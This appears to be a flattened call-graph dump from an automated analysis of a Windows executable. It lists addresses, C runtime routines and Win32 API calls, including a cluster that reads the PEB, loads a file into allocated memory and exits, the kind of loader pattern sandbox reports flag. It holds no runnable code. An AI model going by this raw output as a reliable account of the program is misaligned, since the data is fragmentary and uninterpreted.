EnterCriticalSection 84009->84012 84013 41ba73 84010->84013 84011->83990 84012->84011 84014 41ba8a 84013->84014 84015 4189e6 __getstream InitializeCriticalSectionAndSpinCount 84013->84015 84016 41bad2 ___lock_fhandle LeaveCriticalSection 84014->84016 84015->84014 84016->84009 84018 41b9c4 __close_nolock 67 API calls 84017->84018 84019 41ef6e 84018->84019 84020 41ef84 SetFilePointer 84019->84020 84021 41ef74 84019->84021 84023 41efa3 84020->84023 84024 41ef9b GetLastError 84020->84024 84022 417f23 __wcsicmp_l 67 API calls 84021->84022 84025 41ef79 84022->84025 84023->84025 84026 417f49 __dosmaperr 67 API calls 84023->84026 84024->84023 84025->83997 84026->84025 84027->83982 84028->83988 84029->83983 84030->83989 84032->83996 84033->83997 84034->83988 84036 414e31 84035->84036 84037 414e4d 84035->84037 84081 417f23 67 API calls __getptd_noexit 84036->84081 84038 414e46 84037->84038 84041 41486c __flush 101 API calls 84037->84041 84053 414f08 LeaveCriticalSection LeaveCriticalSection __wfsopen 84038->84053 84040 414e36 84082 417ebb 6 API calls 2 library calls 84040->84082 84043 414e59 84041->84043 84054 41e680 84043->84054 84046 41453a __fileno 67 API calls 84047 414e67 84046->84047 84058 41e5b3 84047->84058 84049 414e6d 84049->84038 84050 413a88 ___wtomb_environ 67 API calls 84049->84050 84050->84038 84051->83768 84053->83771 84055 41e690 84054->84055 84056 414e61 84054->84056 84055->84056 84057 413a88 ___wtomb_environ 67 API calls 84055->84057 84056->84046 84057->84056 84059 41e5bf _flsall 84058->84059 84060 41e5e2 84059->84060 84061 41e5c7 84059->84061 84062 41e5f0 84060->84062 84067 41e631 84060->84067 84098 417f36 67 API calls __getptd_noexit 84061->84098 84100 417f36 67 API calls __getptd_noexit 84062->84100 84065 41e5cc 84099 417f23 67 API calls __getptd_noexit 84065->84099 84066 41e5f5 84101 417f23 67 API calls __getptd_noexit 84066->84101 84070 41ba3b ___lock_fhandle 68 API calls 84067->84070 84073 41e637 84070->84073 84071 41e5d4 _flsall 84071->84049 84072 41e5fc 84102 417ebb 6 API calls 2 library calls 84072->84102 84075 41e652 84073->84075 84076 41e644 84073->84076 84103 417f23 67 API calls __getptd_noexit 84075->84103 84083 41e517 84076->84083 84079 41e64c 84104 41e676 LeaveCriticalSection __unlock_fhandle 84079->84104 84081->84040 84105 41b9c4 84083->84105 84085 41e57d 84118 41b93e 68 API calls 2 library calls 84085->84118 84086 41e527 84086->84085 84088 41b9c4 __close_nolock 67 API calls 84086->84088 84097 41e55b 84086->84097 84090 41e552 84088->84090 84089 41b9c4 __close_nolock 67 API calls 84091 41e567 CloseHandle 84089->84091 84095 41b9c4 __close_nolock 67 API calls 84090->84095 84091->84085 84096 41e573 GetLastError 84091->84096 84092 41e585 84093 41e5a7 84092->84093 84119 417f49 67 API calls 3 library calls 84092->84119 84093->84079 84095->84097 84096->84085 84097->84085 84097->84089 84098->84065 84099->84071 84100->84066 84101->84072 84103->84079 84104->84071 84106 41b9d1 84105->84106 84109 41b9e9 84105->84109 84107 417f36 __write_nolock 67 API calls 84106->84107 84108 41b9d6 84107->84108 84112 417f23 __wcsicmp_l 67 API calls 84108->84112 84110 417f36 __write_nolock 67 API calls 84109->84110 84113 41ba2e 84109->84113 84111 41ba17 84110->84111 84114 417f23 __wcsicmp_l 67 API calls 84111->84114 84115 41b9de 84112->84115 84113->84086 84116 41ba1e 84114->84116 84115->84086 84117 417ebb __wcsicmp_l 6 API calls 84116->84117 84117->84113 84118->84092 84119->84093 84121 415126 _flsall 84120->84121 84122 41513a _memset 84121->84122 84123 41516f 84121->84123 84124 415164 _flsall 84121->84124 84149 417f23 67 API calls __getptd_noexit 84122->84149 84125 415965 __lock_file 68 API calls 84123->84125 84124->83777 84127 415177 84125->84127 84133 414f10 84127->84133 84128 415154 84150 417ebb 6 API calls 2 library calls 84128->84150 84136 414f2e _memset 84133->84136 84138 414f4c 84133->84138 84134 414f37 84202 417f23 67 API calls __getptd_noexit 84134->84202 84136->84134 84136->84138 84145 414f8b 84136->84145 84151 4151a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 84138->84151 84140 4150d5 _memset 84206 417f23 67 API calls __getptd_noexit 84140->84206 84141 4150a9 _memset 84205 417f23 67 API calls __getptd_noexit 84141->84205 84142 41453a __fileno 67 API calls 84142->84145 84145->84138 84145->84140 84145->84141 84145->84142 84152 41ed9e 84145->84152 84182 41e6b1 84145->84182 84204 41ee9b 67 API calls 3 library calls 84145->84204 84147 414f3c 84203 417ebb 6 API calls 2 library calls 84147->84203 84149->84128 84151->84124 84153 41edaa _flsall 84152->84153 84154 41edb2 84153->84154 84155 41edcd 84153->84155 84276 417f36 67 API calls __getptd_noexit 84154->84276 84156 41eddb 84155->84156 84161 41ee1c 84155->84161 84278 417f36 67 API calls __getptd_noexit 84156->84278 84159 41edb7 84277 417f23 67 API calls __getptd_noexit 84159->84277 84160 41ede0 84279 417f23 67 API calls __getptd_noexit 84160->84279 84164 41ee29 84161->84164 84165 41ee3d 84161->84165 84281 417f36 67 API calls __getptd_noexit 84164->84281 84167 41ba3b ___lock_fhandle 68 API calls 84165->84167 84166 41edbf _flsall 84166->84145 84170 41ee43 84167->84170 84168 41ede7 84280 417ebb 6 API calls 2 library calls 84168->84280 84173 41ee50 84170->84173 84174 41ee66 84170->84174 84171 41ee2e 84282 417f23 67 API calls __getptd_noexit 84171->84282 84207 41e7dc 84173->84207 84283 417f23 67 API calls __getptd_noexit 84174->84283 84178 41ee5e 84285 41ee91 LeaveCriticalSection __unlock_fhandle 84178->84285 84179 41ee6b 84284 417f36 67 API calls __getptd_noexit 84179->84284 84183 41e6c1 84182->84183 84186 41e6de 84182->84186 84289 417f23 67 API calls __getptd_noexit 84183->84289 84185 41e6c6 84290 417ebb 6 API calls 2 library calls 84185->84290 84188 41e713 84186->84188 84194 41e6d6 84186->84194 84286 423600 84186->84286 84190 41453a __fileno 67 API calls 84188->84190 84191 41e727 84190->84191 84192 41ed9e __read 79 API calls 84191->84192 84193 41e72e 84192->84193 84193->84194 84195 41453a __fileno 67 API calls 84193->84195 84194->84145 84196 41e751 84195->84196 84196->84194 84197 41453a __fileno 67 API calls 84196->84197 84198 41e75d 84197->84198 84198->84194 84199 41453a __fileno 67 API calls 84198->84199 84200 41e769 84199->84200 84201 41453a __fileno 67 API calls 84200->84201 84201->84194 84202->84147 84204->84145 84205->84147 84206->84147 84208 41e813 84207->84208 84209 41e7f8 84207->84209 84211 41e822 84208->84211 84213 41e849 84208->84213 84210 417f36 __write_nolock 67 API calls 84209->84210 84212 41e7fd 84210->84212 84214 417f36 __write_nolock 67 API calls 84211->84214 84217 417f23 __wcsicmp_l 67 API calls 84212->84217 84216 41e868 84213->84216 84230 41e87c 84213->84230 84215 41e827 84214->84215 84218 417f23 __wcsicmp_l 67 API calls 84215->84218 84219 417f36 __write_nolock 67 API calls 84216->84219 84227 41e805 84217->84227 84221 41e82e 84218->84221 84223 41e86d 84219->84223 84220 41e8d4 84222 417f36 __write_nolock 67 API calls 84220->84222 84224 417ebb __wcsicmp_l 6 API calls 84221->84224 84225 41e8d9 84222->84225 84226 417f23 __wcsicmp_l 67 API calls 84223->84226 84224->84227 84228 417f23 __wcsicmp_l 67 API calls 84225->84228 84229 41e874 84226->84229 84227->84178 84228->84229 84233 417ebb __wcsicmp_l 6 API calls 84229->84233 84230->84220 84230->84227 84231 41e8b0 84230->84231 84232 41e8f5 84230->84232 84231->84220 84239 41e8bb ReadFile 84231->84239 84234 416fb6 __malloc_crt 67 API calls 84232->84234 84233->84227 84236 41e90b 84234->84236 84242 41e931 84236->84242 84243 41e913 84236->84243 84237 41ed62 GetLastError 84240 41ebe8 84237->84240 84241 41ed6f 84237->84241 84238 41e9e7 84238->84237 84246 41e9fb 84238->84246 84239->84237 84239->84238 84250 417f49 __dosmaperr 67 API calls 84240->84250 84255 41eb6d 84240->84255 84244 417f23 __wcsicmp_l 67 API calls 84241->84244 84247 423462 __lseeki64_nolock 69 API calls 84242->84247 84245 417f23 __wcsicmp_l 67 API calls 84243->84245 84248 41ed74 84244->84248 84249 41e918 84245->84249 84246->84255 84256 41ea17 84246->84256 84259 41ec2d 84246->84259 84251 41e93d 84247->84251 84252 417f36 __write_nolock 67 API calls 84248->84252 84253 417f36 __write_nolock 67 API calls 84249->84253 84250->84255 84251->84239 84252->84255 84253->84227 84254 413a88 ___wtomb_environ 67 API calls 84254->84227 84255->84227 84255->84254 84257 41ea7d ReadFile 84256->84257 84266 41eafa 84256->84266 84260 41ea9b GetLastError 84257->84260 84269 41eaa5 84257->84269 84258 41eca5 ReadFile 84261 41ecc4 GetLastError 84258->84261 84267 41ecce 84258->84267 84259->84255 84259->84258 84260->84256 84260->84269 84261->84259 84261->84267 84262 41ebbe MultiByteToWideChar 84262->84255 84263 41ebe2 GetLastError 84262->84263 84263->84240 84264 41eb75 84272 41ebac 84264->84272 84275 41eb32 84264->84275 84265 41eb68 84268 417f23 __wcsicmp_l 67 API calls 84265->84268 84266->84255 84266->84264 84266->84265 84266->84275 84267->84259 84271 423462 __lseeki64_nolock 69 API calls 84267->84271 84268->84255 84269->84256 84270 423462 __lseeki64_nolock 69 API calls 84269->84270 84270->84269 84271->84267 84273 423462 __lseeki64_nolock 69 API calls 84272->84273 84274 41ebbb 84273->84274 84274->84262 84275->84262 84276->84159 84277->84166 84278->84160 84279->84168 84281->84171 84282->84168 84283->84179 84284->84178 84285->84166 84287 416fb6 __malloc_crt 67 API calls 84286->84287 84288 423615 84287->84288 84288->84188 84289->84185 84294 414cef GetSystemTimeAsFileTime __aulldiv 84291->84294 84293 4431ef 84293->83780 84294->84293 84295->83788 84297->83793 84303 4523e1 _wcscpy 84298->84303 84299 4151b0 81 API calls __fread_nolock 84299->84303 84300 44afdc GetSystemTimeAsFileTime 84300->84303 84301 452553 84301->83702 84301->83703 84302 41557c 105 API calls _fseek 84302->84303 84303->84299 84303->84300 84303->84301 84303->84302 84305 44b1b4 84304->84305 84306 44b1a6 84304->84306 84308 44b1ca 84305->84308 84309 414e06 138 API calls 84305->84309 84310 44b1c2 84305->84310 84307 414e06 138 API calls 84306->84307 84307->84305 84339 4352d1 81 API calls 2 library calls 84308->84339 84312 44b2c1 84309->84312 84310->83731 84312->84308 84314 44b2cf 84312->84314 84313 44b20d 84315 44b211 84313->84315 84316 44b23b 84313->84316 84317 44b2dc 84314->84317 84319 414e94 __fcloseall 106 API calls 84314->84319 84318 44b21e 84315->84318 84321 414e94 __fcloseall 106 API calls 84315->84321 84340 43526e 84316->84340 84317->83731 84322 44b22e 84318->84322 84326 414e94 __fcloseall 106 API calls 84318->84326 84319->84317 84321->84318 84322->83731 84323 44b242 84324 44b270 84323->84324 84325 44b248 84323->84325 84350 44b0af 111 API calls 84324->84350 84327 44b255 84325->84327 84329 414e94 __fcloseall 106 API calls 84325->84329 84326->84322 84330 44b265 84327->84330 84332 414e94 __fcloseall 106 API calls 84327->84332 84329->84327 84330->83731 84331 44b276 84351 43522c 67 API calls ___wtomb_environ 84331->84351 84332->84330 84334 44b27c 84335 44b289 84334->84335 84337 414e94 __fcloseall 106 API calls 84334->84337 84336 44b299 84335->84336 84338 414e94 __fcloseall 106 API calls 84335->84338 84336->83731 84337->84335 84338->84336 84339->84313 84341 4138ba _malloc 67 API calls 84340->84341 84342 43527d 84341->84342 84343 4138ba _malloc 67 API calls 84342->84343 84344 43528d 84343->84344 84345 4138ba _malloc 67 API calls 84344->84345 84346 43529d 84345->84346 84348 4352bc 84346->84348 84352 43522c 67 API calls ___wtomb_environ 84346->84352 84348->84323 84349 4352c8 84349->84323 84350->84331 84351->84334 84352->84349 84353->83608 84355 410148 SHGetDesktopFolder 84354->84355 84358 4101a3 _wcscpy 84354->84358 84356 41015a _wcscpy 84355->84356 84355->84358 84357 41018a SHGetPathFromIDListW 84356->84357 84356->84358 84357->84358 84358->83612 84359->83614 84361 40f5e0 152 API calls 84360->84361 84362 40f417 84361->84362 84363 42ca37 84362->84363 84365 40f42c 84362->84365 84366 42ca1f 84362->84366 84364 452574 140 API calls 84363->84364 84368 42ca50 84364->84368 84398 4037e0 139 API calls 7 library calls 84365->84398 84399 43717f 110 API calls _printf 84366->84399 84371 42ca76 84368->84371 84372 42ca54 84368->84372 84370 42ca2d 84370->84363 84375 41171a 75 API calls 84371->84375 84374 434fe1 106 API calls 84372->84374 84373 40f446 84373->83611 84376 42ca5e 84374->84376 84387 42cacc ctype 84375->84387 84400 43717f 110 API calls _printf 84376->84400 84378 42ccc3 84380 413a88 ___wtomb_environ 67 API calls 84378->84380 84379 42ca6c 84379->84371 84381 42cccd 84380->84381 84382 434fe1 106 API calls 84381->84382 84383 42ccda 84382->84383 84387->84378 84388 401b70 75 API calls 84387->84388 84391 402cc0 75 API calls 2 library calls 84387->84391 84392 4026a0 84387->84392 84401 445051 75 API calls _memcpy_s 84387->84401 84402 44c80c 87 API calls 3 library calls 84387->84402 84403 44b408 75 API calls 84387->84403 84388->84387 84391->84387 84393 4026af 84392->84393 84395 40276b 84392->84395 84394 41171a 75 API calls 84393->84394 84393->84395 84396 4026ee ctype 84393->84396 84394->84396 84395->84387 84396->84395 84397 41171a 75 API calls 84396->84397 84397->84396 84398->84373 84399->84370 84400->84379 84401->84387 84402->84387 84403->84387 84404->83621 84405->83622 84406 444343 84409 444326 84406->84409 84408 44434e WriteFile 84410 444340 84409->84410 84411 4442c7 84409->84411 84410->84408 84416 40e190 SetFilePointerEx 84411->84416 84413 4442e0 SetFilePointerEx 84417 40e190 SetFilePointerEx 84413->84417 84415 4442ff 84415->84408 84416->84413 84417->84415 84418 46d22f 84421 46d098 84418->84421 84420 46d241 84422 46d0b5 84421->84422 84423 46d115 84422->84423 84424 46d0b9 84422->84424 84472 45c216 78 API calls 84423->84472 84426 41171a 75 API calls 84424->84426 84428 46d0c0 84426->84428 84427 46d126 84430 46d0f8 84427->84430 84436 46d142 84427->84436 84429 46d0cc 84428->84429 84465 40d940 76 API calls 84428->84465 84466 453063 84429->84466 84432 4092c0 VariantClear 84430->84432 84434 46d0fd 84432->84434 84434->84420 84437 46d1c8 84436->84437 84440 46d158 84436->84440 84478 4676a3 78 API calls 84437->84478 84443 453063 111 API calls 84440->84443 84441 46d0ea 84441->84436 84444 46d0ee 84441->84444 84442 46d1ce 84479 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84442->84479 84452 46d15e 84443->84452 84444->84430 84471 44ade5 CloseHandle ctype 84444->84471 84445 46d18d 84473 467fce 82 API calls 84445->84473 84449 46d196 84474 4013a0 75 API calls 84449->84474 84450 46d1e7 84454 4092c0 VariantClear 84450->84454 84463 46d194 84450->84463 84452->84445 84452->84449 84453 46d1a2 84475 40df50 75 API calls 84453->84475 84454->84463 84456 46d1ac 84476 40d3b0 75 API calls 2 library calls 84456->84476 84458 46d224 84458->84420 84459 46d1b8 84477 467fce 82 API calls 84459->84477 84460 40d900 CloseHandle 84462 46d216 84460->84462 84480 44ade5 CloseHandle ctype 84462->84480 84463->84458 84463->84460 84465->84429 84467 45306e 84466->84467 84468 45307a 84466->84468 84467->84468 84481 452e2a 111 API calls 5 library calls 84467->84481 84470 40dfa0 83 API calls 84468->84470 84470->84441 84471->84430 84472->84427 84473->84463 84474->84453 84475->84456 84476->84459 84477->84463 84478->84442 84479->84450 84480->84458 84481->84468 84482 40116e 84483 401119 DefWindowProcW 84482->84483 84484 40d0963 84485 40d0978 84484->84485 84493 40ce008 84485->84493 84487 40d0984 84488 40d0a38 84487->84488 84489 40d09a2 84487->84489 84509 40d12e8 9 API calls 84488->84509 84496 40d0648 84489->84496 84492 40d0a1f 84510 40d14f8 GetPEB 84493->84510 84495 40ce693 84495->84487 84497 40ce008 GetPEB 84496->84497 84506 40d06e7 84497->84506 84499 40d0718 CreateFileW 84502 40d0725 84499->84502 84499->84506 84500 40d0741 VirtualAlloc 84501 40d0762 ReadFile 84500->84501 84500->84502 84501->84502 84505 40d0780 VirtualAlloc 84501->84505 84503 40d0934 VirtualFree 84502->84503 84504 40d0942 84502->84504 84503->84504 84504->84492 84505->84502 84505->84506 84506->84500 84506->84502 84507 40d0848 CloseHandle 84506->84507 84508 40d0858 VirtualFree 84506->84508 84512 40d1558 GetPEB 84506->84512 84507->84506 84508->84506 84509->84492 84511 40d1522 84510->84511 84511->84495 84513 40d1582 84512->84513 84513->84499 84514 40f110 RegOpenKeyExW 84515 40f13c RegQueryValueExW RegCloseKey 84514->84515 84516 40f15f 84514->84516 84515->84516 84517 429212 84522 410b90 84517->84522 84520 411421 __cinit 74 API calls 84521 42922f 84520->84521 84523 410b9a __write_nolock 84522->84523 84524 41171a 75 API calls 84523->84524 84525 410c31 GetModuleFileNameW 84524->84525 84539 413db0 84525->84539 84527 410c66 _wcsncat 84542 413e3c 84527->84542 84530 41171a 75 API calls 84531 410ca3 _wcscpy 84530->84531 84532 410cd1 RegOpenKeyExW 84531->84532 84533 429bc3 RegQueryValueExW 84532->84533 84534 410cf7 84532->84534 84535 429cd9 RegCloseKey 84533->84535 84537 429bf2 _wcscat _wcslen _wcsncpy 84533->84537 84534->84520 84536 41171a 75 API calls 84536->84537 84537->84536 84538 429cd8 84537->84538 84538->84535 84545 413b95 84539->84545 84575 41abec 84542->84575 84546 413c2f 84545->84546 84552 413bae 84545->84552 84547 413d60 84546->84547 84548 413d7b 84546->84548 84571 417f23 67 API calls __getptd_noexit 84547->84571 84573 417f23 67 API calls __getptd_noexit 84548->84573 84551 413d65 84554 413cfb 84551->84554 84572 417ebb 6 API calls 2 library calls 84551->84572 84552->84546 84561 413c1d 84552->84561 84567 41ab19 67 API calls __wcsicmp_l 84552->84567 84554->84527 84556 413d03 84556->84546 84556->84554 84558 413d8e 84556->84558 84557 413cb9 84557->84546 84559 413cd6 84557->84559 84569 41ab19 67 API calls __wcsicmp_l 84557->84569 84574 41ab19 67 API calls __wcsicmp_l 84558->84574 84559->84546 84559->84554 84562 413cef 84559->84562 84561->84546 84566 413c9b 84561->84566 84568 41ab19 67 API calls __wcsicmp_l 84561->84568 84570 41ab19 67 API calls __wcsicmp_l 84562->84570 84566->84556 84566->84557 84567->84561 84568->84566 84569->84559 84570->84554 84571->84551 84573->84551 84574->84554 84576 41ac02 84575->84576 84577 41abfd 84575->84577 84584 417f23 67 API calls __getptd_noexit 84576->84584 84577->84576 84582 41ac22 84577->84582 84579 41ac07 84585 417ebb 6 API calls 2 library calls 84579->84585 84581 410c99 84581->84530 84582->84581 84586 417f23 67 API calls __getptd_noexit 84582->84586 84584->84579 84586->84579 84587 401230 84588 4012c5 84587->84588 84589 401241 _memset 84587->84589 84602 401be0 84589->84602 84591 40126b 84592 4012ae KillTimer SetTimer 84591->84592 84593 42aa61 84591->84593 84594 401298 84591->84594 84592->84588 84597 42aa8b Shell_NotifyIconW 84593->84597 84598 42aa69 Shell_NotifyIconW 84593->84598 84595 4012a2 84594->84595 84596 42aaac 84594->84596 84595->84592 84599 42aaf8 Shell_NotifyIconW 84595->84599 84600 42aad7 Shell_NotifyIconW 84596->84600 84601 42aab5 Shell_NotifyIconW 84596->84601 84597->84592 84598->84592 84599->84592 84600->84592 84601->84592 84603 401bfb 84602->84603 84623 401cde 84602->84623 84624 4013a0 75 API calls 84603->84624 84605 401c0b 84606 42a9a0 LoadStringW 84605->84606 84607 401c18 84605->84607 84609 42a9bb 84606->84609 84625 4021e0 84607->84625 84638 40df50 75 API calls 84609->84638 84610 401c2d 84611 401c3a 84610->84611 84612 42a9cd 84610->84612 84611->84609 84614 401c44 84611->84614 84639 40d3b0 75 API calls 2 library calls 84612->84639 84637 40d3b0 75 API calls 2 library calls 84614->84637 84617 42a9dc 84618 42a9f0 84617->84618 84619 401c53 _memset _wcscpy _wcsncpy 84617->84619 84640 40d3b0 75 API calls 2 library calls 84618->84640 84622 401cc2 Shell_NotifyIconW 84619->84622 84621 42a9fe 84622->84623 84623->84591 84624->84605 84626 4021f1 _wcslen 84625->84626 84627 42a598 84625->84627 84630 402205 84626->84630 84631 402226 84626->84631 84643 40c740 84627->84643 84629 42a5a2 84641 404020 75 API calls ctype 84630->84641 84642 401380 75 API calls 84631->84642 84634 40220c _memcpy_s 84634->84610 84635 40222d 84635->84629 84636 41171a 75 API calls 84635->84636 84636->84634 84637->84619 84638->84619 84639->84617 84640->84621 84641->84634 84642->84635 84644 40c752 84643->84644 84645 40c747 84643->84645 84644->84629 84645->84644 84648 402ae0 75 API calls _memcpy_s 84645->84648 84647 42a572 _memcpy_s 84647->84629 84648->84647 84649 4034b0 84650 4034b9 84649->84650 84651 4034bd 84649->84651 84652 41171a 75 API calls 84651->84652 84653 42a0ba 84651->84653 84654 4034fe _memcpy_s ctype 84652->84654 84655 40d03b8 84656 40ce008 GetPEB 84655->84656 84657 40d04c9 84656->84657 84669 40d02a8 84657->84669 84659 40d04f2 CreateFileW 84661 40d0549 84659->84661 84664 40d0544 84659->84664 84662 40d0560 VirtualAlloc 84661->84662 84661->84664 84663 40d057e ReadFile 84662->84663 84662->84664 84663->84664 84665 40d059c 84663->84665 84666 40cf2a8 13 API calls 84665->84666 84667 40d05cf 84666->84667 84668 40d05f2 ExitProcess 84667->84668 84668->84664 84670 40d02b1 Sleep 84669->84670 84671 40d02bf 84670->84671 84672 431914 84673 431920 84672->84673 84674 431928 84673->84674 84675 43193d 84673->84675 84936 45e62e 116 API calls 3 library calls 84674->84936 84937 47f2b4 174 API calls 84675->84937 84678 43194a 84715 4095b0 ctype 84678->84715 84938 45e62e 116 API calls 3 library calls 84678->84938 84679 409708 84682 4097af 84682->84679 84923 40d590 VariantClear 84682->84923 84684 4315b8 WaitForSingleObject 84686 4315d6 GetExitCodeProcess CloseHandle 84684->84686 84684->84715 84927 40d590 VariantClear 84686->84927 84687 431623 Sleep 84690 43163b timeGetTime 84687->84690 84711 409894 84687->84711 84690->84711 84693 40986e Sleep 84695 409880 timeGetTime 84693->84695 84693->84711 84694 4098f1 TranslateMessage DispatchMessageW 84694->84715 84695->84711 84696 431673 CloseHandle 84696->84711 84697 40d590 VariantClear 84697->84711 84698 43170c GetExitCodeProcess CloseHandle 84698->84711 84700 46dd22 133 API calls 84700->84711 84702 46e641 134 API calls 84702->84711 84703 431781 Sleep 84703->84715 84707 4092c0 VariantClear 84707->84711 84708 45e62e 116 API calls 84708->84715 84711->84696 84711->84697 84711->84698 84711->84700 84711->84702 84711->84703 84711->84707 84711->84715 84924 447e59 75 API calls 84711->84924 84925 453b07 77 API calls 84711->84925 84926 4646a2 76 API calls 84711->84926 84928 444233 88 API calls _wcslen 84711->84928 84929 457509 VariantClear 84711->84929 84930 404120 84711->84930 84934 4717e3 VariantClear 84711->84934 84935 436272 6 API calls 84711->84935 84714 4319c9 VariantClear 84714->84715 84715->84679 84715->84682 84715->84684 84715->84687 84715->84693 84715->84694 84715->84708 84715->84711 84715->84714 84716 4092c0 VariantClear 84715->84716 84718 40b380 84715->84718 84742 409340 84715->84742 84775 409030 84715->84775 84789 40d300 84715->84789 84794 40d320 84715->84794 84800 409a40 84715->84800 84939 40e380 VariantClear ctype 84715->84939 84716->84715 84719 40b3a5 84718->84719 84720 40b53d 84718->84720 84721 430a99 84719->84721 84727 40b3b6 84719->84727 84940 45e62e 116 API calls 3 library calls 84720->84940 84941 45e62e 116 API calls 3 library calls 84721->84941 84724 430aae 84729 4092c0 VariantClear 84724->84729 84725 40b528 84725->84715 84727->84724 84730 40b3f2 84727->84730 84740 40b4fd ctype 84727->84740 84728 430dc9 84728->84728 84729->84725 84731 40b429 84730->84731 84733 430ae9 VariantClear 84730->84733 84734 40b476 ctype 84730->84734 84738 40b43b ctype 84731->84738 84942 40e380 VariantClear ctype 84731->84942 84732 40b4eb 84732->84740 84943 40e380 VariantClear ctype 84732->84943 84733->84738 84734->84732 84741 430d08 ctype 84734->84741 84735 430d41 VariantClear 84735->84740 84738->84734 84739 41171a 75 API calls 84738->84739 84739->84734 84740->84725 84944 45e62e 116 API calls 3 library calls 84740->84944 84741->84735 84741->84740 84743 409386 84742->84743 84749 409395 84742->84749 84945 4042f0 75 API calls __cinit 84743->84945 84746 42fba9 84949 45e62e 116 API calls 3 library calls 84746->84949 84748 42fc07 84951 45e62e 116 API calls 3 library calls 84748->84951 84749->84746 84749->84748 84750 409484 ctype 84749->84750 84752 42fc85 84749->84752 84754 42fcd8 84749->84754 84756 42fd4f 84749->84756 84760 42fd39 84749->84760 84763 40946f 84749->84763 84766 40947b 84749->84766 84768 4094c1 84749->84768 84771 4092c0 VariantClear 84749->84771 84948 453155 75 API calls 84749->84948 84950 40c620 118 API calls 84749->84950 84952 45e62e 116 API calls 3 library calls 84749->84952 84750->84715 84953 4781ae 140 API calls 84752->84953 84955 47f2b4 174 API calls 84754->84955 84758 4092c0 VariantClear 84756->84758 84758->84750 84759 42fc9c 84759->84750 84954 45e62e 116 API calls 3 library calls 84759->84954 84957 45e62e 116 API calls 3 library calls 84760->84957 84762 42fce9 84762->84750 84956 45e62e 116 API calls 3 library calls 84762->84956 84946 409210 VariantClear 84763->84946 84770 4092c0 VariantClear 84766->84770 84768->84750 84947 404260 76 API calls 84768->84947 84770->84750 84771->84749 84773 4094e1 84774 4092c0 VariantClear 84773->84774 84774->84750 84958 409110 117 API calls 84775->84958 84777 42ceb6 84968 410ae0 VariantClear ctype 84777->84968 84779 42cebf 84780 40906e 84780->84777 84781 42cea9 84780->84781 84783 4090a4 84780->84783 84967 45e62e 116 API calls 3 library calls 84781->84967 84959 404160 84783->84959 84786 4090f0 ctype 84786->84715 84787 4092c0 VariantClear 84788 4090be ctype 84787->84788 84788->84786 84788->84787 84790 4292e3 84789->84790 84791 40d30c 84789->84791 84792 429323 84790->84792 84793 4292fd TranslateAcceleratorW 84790->84793 84791->84715 84792->84715 84793->84791 84795 4296d0 84794->84795 84798 40d32f 84794->84798 84795->84715 84796 42972a IsDialogMessageW 84797 40d33c 84796->84797 84796->84798 84797->84715 84798->84796 84798->84797 85103 4340ec GetClassLongW 84798->85103 84801 409a66 _wcslen 84800->84801 84802 41171a 75 API calls 84801->84802 84862 40aade _memcpy_s ctype 84801->84862 84803 409a9c _memcpy_s 84802->84803 84804 41171a 75 API calls 84803->84804 84806 409abd 84804->84806 84809 409aeb CharUpperBuffW 84806->84809 84812 409b09 ctype 84806->84812 84806->84862 84807 42cee9 84808 41171a 75 API calls 84807->84808 84850 42cf10 _memcpy_s 84808->84850 84809->84812 84853 409b88 ctype 84812->84853 85106 47d10e 150 API calls 84812->85106 84813 4092c0 VariantClear 84814 42e5e0 84813->84814 85138 410ae0 VariantClear ctype 84814->85138 84816 42e5f2 84817 409e4a 84819 41171a 75 API calls 84817->84819 84824 409ea4 84817->84824 84817->84850 84818 40aa5b 84821 41171a 75 API calls 84818->84821 84819->84824 84820 41171a 75 API calls 84820->84853 84838 40aa81 _memcpy_s ctype 84821->84838 84822 409ed0 84826 42d50d 84822->84826 84883 409ef8 _memcpy_s ctype 84822->84883 85116 40b800 VariantClear VariantClear ctype 84822->85116 84824->84822 84825 41171a 75 API calls 84824->84825 84827 42d480 84825->84827 84830 42d527 84826->84830 85117 40b800 VariantClear VariantClear ctype 84826->85117 84829 42d491 84827->84829 85112 44b3f6 75 API calls 84827->85112 85113 40df50 75 API calls 84829->85113 84830->84883 85118 40e2e0 VariantClear ctype 84830->85118 84831 42d195 VariantClear 84831->84853 84832 40a3a7 84835 40a415 84832->84835 84884 42db5c 84832->84884 84842 41171a 75 API calls 84835->84842 84836 4092c0 VariantClear 84836->84853 84846 41171a 75 API calls 84838->84846 84859 40a41c 84842->84859 84844 42db96 85124 45e62e 116 API calls 3 library calls 84844->85124 84846->84862 84847 42d4a6 85114 4530b3 75 API calls 84847->85114 84849 42d128 84852 4092c0 VariantClear 84849->84852 85137 45e62e 116 API calls 3 library calls 84850->85137 84851 42d4d7 85115 4530b3 75 API calls 84851->85115 84858 42d131 84852->84858 84853->84817 84853->84818 84853->84820 84853->84831 84853->84836 84853->84838 84853->84849 84853->84850 84854 42d20c 84853->84854 84860 42dbb9 84853->84860 85107 40c3e0 75 API calls 84853->85107 85108 40c620 118 API calls 84853->85108 85110 40be00 75 API calls 2 library calls 84853->85110 85111 40e380 VariantClear ctype 84853->85111 84854->84715 85109 410ae0 VariantClear ctype 84858->85109 84868 40a481 84859->84868 85125 40c8a0 VariantClear ctype 84859->85125 84860->84813 85105 401380 75 API calls 84862->85105 84864 402cc0 75 API calls 84864->84883 84866 4092c0 VariantClear 84896 40a534 _memcpy_s ctype 84866->84896 84867 411421 74 API calls __cinit 84867->84883 84869 40a4ed 84868->84869 84871 42dc1e VariantClear 84868->84871 84868->84896 84875 40a4ff ctype 84869->84875 85126 40e380 VariantClear ctype 84869->85126 84870 41171a 75 API calls 84870->84883 84871->84875 84874 41171a 75 API calls 84874->84896 84875->84874 84875->84896 84879 44b3f6 75 API calls 84879->84883 84880 42deb6 VariantClear 84880->84896 84881 40a73c 84882 42e237 84881->84882 84891 40a76b 84881->84891 85130 46e709 VariantClear VariantClear ctype 84882->85130 84883->84832 84883->84844 84883->84862 84883->84864 84883->84867 84883->84870 84883->84879 84883->84884 84889 40a053 84883->84889 85119 45ee98 75 API calls 84883->85119 85120 4019e0 76 API calls 84883->85120 85121 404260 76 API calls 84883->85121 85122 409210 VariantClear 84883->85122 85123 4721e5 VariantClear 84884->85123 84885 42df47 VariantClear 84885->84896 84886 42dfe9 VariantClear 84886->84896 84888 40a7a2 84902 40a7ad ctype 84888->84902 85131 40b800 VariantClear VariantClear ctype 84888->85131 84889->84715 84890 40e380 VariantClear 84890->84896 84891->84888 84914 40a800 ctype 84891->84914 85104 40b800 VariantClear VariantClear ctype 84891->85104 84894 41171a 75 API calls 84894->84896 84895 41171a 